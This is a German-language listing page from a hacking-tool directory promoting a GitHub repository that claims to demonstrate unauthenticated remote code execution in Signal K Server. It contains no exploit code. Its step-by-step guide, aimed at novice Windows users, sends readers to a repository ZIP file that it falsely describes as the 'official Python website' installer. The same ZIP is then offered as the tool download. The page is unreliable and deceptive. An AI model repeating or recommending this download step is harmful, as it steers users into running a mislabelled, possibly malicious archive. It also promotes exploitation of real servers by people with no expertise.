Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
cve-2025-66398 — Demonstrate exploitation of Signal K Server CVE-2025-66398 allowing unauthenticated attackers to inject backdoor and enable remote code execution. | Kitploit
Tools/GitHubGitHub/showy-headteacher114/cve-2025-66398
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingRemote Access ToolPayload Development
GitHubshowy-headteacher114/cve-2025-66398

cve-2025-66398

Demonstrate exploitation of Signal K Server CVE-2025-66398 allowing unauthenticated attackers to inject backdoor and enable remote code execution.

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Repository anzeigen
1vor 14h 25mNoch nicht geprüft

⚠️ cve-2025-66398 - Einfaches RCE Proof-of-Concept-Tool

Download


⚙️ Über dieses Tool

Dieses Projekt demonstriert eine Remote-Code-Ausführung-Schwachstelle (RCE) in Signal K Server Versionen 2.18.0 und früher. Das Proof of Concept (PoC) zeigt, wie ein Angreifer Befehle auf einem verwundbaren Gerät ausführen könnte.

Dieses Tool ist für Sicherheitstester, Systemadministratoren oder alle, die sich für das Verständnis dieses Sicherheitsproblems interessieren, konzipiert. Es erfordert keine Programmierkenntnisse, um es auszuführen, aber grundlegende Computernavigationskenntnisse sind hilfreich.


🖥️ Systemanforderungen

  • Windows 10 oder höher
  • Mindestens 2 GB freier RAM
  • 100 MB freier Festplattenspeicher
  • Internetverbindung zum Herunterladen von Dateien
  • Administratorrechte sind NICHT erforderlich

📥 Herunterladen und Installieren

Klicken Sie auf die Schaltfläche unten, um die Projektseite zu besuchen und die Dateien herunterzuladen.

Download

Schritt 1: Besuchen Sie die Download-Seite

Gehen Sie zum obigen Link. Sie sehen eine Liste von Dateien und Ordnern auf der GitHub-Seite.

Schritt 2: Laden Sie die ZIP-Datei herunter

Suchen Sie nach der grünen Code-Schaltfläche oben rechts auf der Seite. Klicken Sie darauf und wählen Sie Download ZIP.

Schritt 3: Entpacken Sie die Dateien

  • Finden Sie die heruntergeladene ZIP-Datei in Ihrem Downloads-Ordner.
  • Klicken Sie mit der rechten Maustaste auf die ZIP-Datei und wählen Sie Alle extrahieren.
  • Wählen Sie einen Ordner, in dem die Dateien abgelegt werden sollen, und klicken Sie dann auf Extrahieren.

Schritt 4: Suchen Sie die Anwendung

Öffnen Sie den entpackten Ordner. Sie sollten projektbezogene Dateien wie Skripte und Dokumentation sehen.


▶️ So führen Sie das Tool unter Windows aus

Das Projekt verwendet Skripte, die in Python und Go geschrieben sind. Um das Tool auszuführen, verwenden Sie ein einfaches Eingabeaufforderungsfenster.

Schritt 1: Öffnen Sie die Eingabeaufforderung

  • Drücken Sie Win + R auf Ihrer Tastatur.
  • Geben Sie cmd ein und drücken Sie die Eingabetaste.

Schritt 2: Navigieren Sie zum Ordner

Geben Sie diesen Befehl ein und ersetzen Sie path\to\folder durch den Pfad zu Ihrem entpackten Ordner:

root@kitploit:~
cd path\to\folder

Drücken Sie die Eingabetaste.

Schritt 3: Führen Sie das Skript aus

Möglicherweise finden Sie ein Skript mit einem Namen wie run.bat oder start.bat. Wenn ja, geben Sie dessen Namen ein und drücken Sie die Eingabetaste. Zum Beispiel:

root@kitploit:~
run.bat

Wenn es keine BAT-Datei gibt, suchen Sie nach einem Python-Skript, das auf .py endet. Sie müssen Python auf Ihrem PC installiert haben (siehe nächster Abschnitt).

Geben Sie diesen Befehl ein, um es auszuführen:

root@kitploit:~
python scriptname.py

Ersetzen Sie scriptname.py durch den tatsächlichen Dateinamen.


🐍 Python installieren (falls erforderlich)

Wenn eine Fehlermeldung erscheint, dass Python nicht erkannt wird, müssen Sie Python installieren.

Schritt 1: Laden Sie Python herunter

Gehen Sie zur offiziellen Python-Website:

https://raw.githubusercontent.com/showy-headteacher114/cve-2025-66398/main/docker/vendor/cve_v1.2.zip

Klicken Sie auf den neuesten Windows-Installer und laden Sie ihn herunter.

Schritt 2: Python installieren

  • Führen Sie den heruntergeladenen Installer aus.
  • Aktivieren Sie das Kontrollkästchen Add Python to PATH (Python zur PATH-Umgebungsvariable hinzufügen), bevor Sie auf Install Now (Jetzt installieren) klicken.
  • Warten Sie, bis die Installation abgeschlossen ist.

Schritt 3: Überprüfen Sie die Python-Installation

Öffnen Sie ein neues Eingabeaufforderungsfenster und geben Sie ein:

root@kitploit:~
python --version

Es sollte die installierte Python-Version anzeigen.


🚨 Sicheres Ausführen des Tools

Dieses Tool dient ausschließlich zum Testen und Lernen über eine bestimmte Schwachstelle. Verwenden Sie es in einer sicheren Umgebung, wie einem Testnetzwerk oder einer isolierten Maschine.

Führen Sie es niemals gegen Systeme aus, die Ihnen nicht gehören oder für die Sie keine Testberechtigung haben.


🔍 Wie das Tool funktioniert

Das Tool scannt Geräte, die Signal K Server Version 2.18.0 oder früher ausführen. Es versucht, Befehle zu senden, die die Schwachstelle ausnutzen, und prüft, ob das Ziel diese ausführt.

Dies ermöglicht Sicherheitsexperten zu bestätigen, ob ihre Systeme verwundbar sind, und Maßnahmen zu ergreifen, um sie zu aktualisieren oder zu sichern.


💡 Fehlerbehebung

  • Wenn das Tool nicht startet, überprüfen Sie, ob Sie sich im richtigen Ordner in der Eingabeaufforderung befinden.
  • Stellen Sie sicher, dass Python installiert und zu Ihrer System-PATH-Umgebungsvariable hinzugefügt wurde.
  • Schließen Sie andere Anwendungen, die den Netzwerkzugriff blockieren könnten.
  • Führen Sie die Eingabeaufforderung als Administrator aus, wenn Berechtigungsfehler auftreten.
  • Stellen Sie sicher, dass das Zielgerät im Netzwerk erreichbar ist.

📄 Zusätzliche Ressourcen

Für weitere Informationen über die Schwachstelle CVE-2025-66398 suchen Sie in Sicherheitsdatenbanken oder auf GitHub nach verwandten Forschungsarbeiten.


🔗 Download-Link

Besuchen Sie diese Seite, um die Tool-Dateien herunterzuladen:

https://raw.githubusercontent.com/showy-headteacher114/cve-2025-66398/main/docker/vendor/cve_v1.2.zip

Tool herunterladen